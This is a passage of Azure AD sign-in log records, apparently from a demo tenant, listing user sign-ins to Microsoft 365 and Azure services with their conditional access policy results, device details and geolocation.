{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:34,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'IE 7.0', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",9303d935-cf24-489a-bd00-a11cbf5e0700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Teams Services,9303d935-cf24-489a-bd00-a11cbf5e0700,SigninLogs,Sucess,50.6406517,5.572050095
+1520,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,53:23.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ae188e28-3116-473f-96bf-d57f486d4b80,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:53,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",db91dc04-4e1d-4696-94f9-efce33fd0700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,db91dc04-4e1d-4696-94f9-efce33fd0700,SigninLogs,Sucess,34.06555176,-118.2405396
+1521,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:37.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,32ae469f-e0ef-0000-5d33-f20cbe0805e3,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:34,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",5ef5316a-deee-4f03-8fd7-4abf94560600,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,5ef5316a-deee-4f03-8fd7-4abf94560600,SigninLogs,Sucess,50.6406517,5.572050095
+1522,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:42.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8832a75f-df05-4fda-b1dd-ea735aa95dfa,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Microsoft Teams,1fec8e78-bce4-4aaf-ab1b-5451cc387264,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:34,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'IE 7.0', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",9303d935-cf24-489a-bd00-a11cbf5e0700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Teams Services,9303d935-cf24-489a-bd00-a11cbf5e0700,SigninLogs,Sucess,50.6406517,5.572050095
+1523,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:00.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,1ca435e5-ea3e-439e-9928-009a002fff13,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",e9cfabe1-d666-446f-aeb7-581727c80700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e9cfabe1-d666-446f-aeb7-581727c80700,SigninLogs,Sucess,36.6404686,-78.26995087
+1524,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,53:30.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,fbeb4ba6-4835-4e6a-9b18-a32013ca0a7a,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:53,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",58101571-c323-4e3c-9694-0b12f35c0600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,58101571-c323-4e3c-9694-0b12f35c0600,SigninLogs,Sucess,34.06555176,-118.2405396
+1525,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:03.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f8118166-e7c3-4c0b-96f7-b081fa3ad4cf,Microsoft.aadiam,Microsoft.aadiam,,Itay Argoety,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:36,"{'operatingSystem': 'Windows 10', 'deviceId': 'e13209ab-3ad5-4902-9922-f9751fc57345', 'browser': 'Chrome 80.0.3987', 'displayName': 'Itay-Surface', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",3dc3c81e-fee3-494a-96e7-8046af902000,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.7778205871582, 'latitude': 32.066158294677734}, 'state': 'Tel Aviv', 'city': 'Tel Aviv-Yafo'}",none,none,none,none,[],{'errorCode': 0},Itay Argoety,2a2efcf8-e871-441d-bcc9-b58e88aff769,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,3dc3c81e-fee3-494a-96e7-8046af902000,SigninLogs,Sucess,32.06615829,34.77782059
+1526,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,54:10.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,51af469f-7038-0000-54b3-36992a36b31e,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:54,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",93ca542e-4eab-45c4-8608-b715dd0d0700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,93ca542e-4eab-45c4-8608-b715dd0d0700,SigninLogs,Sucess,34.06555176,-118.2405396
+1527,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,35:29.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4708af31-f73a-4fe9-983c-7636018af3ac,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 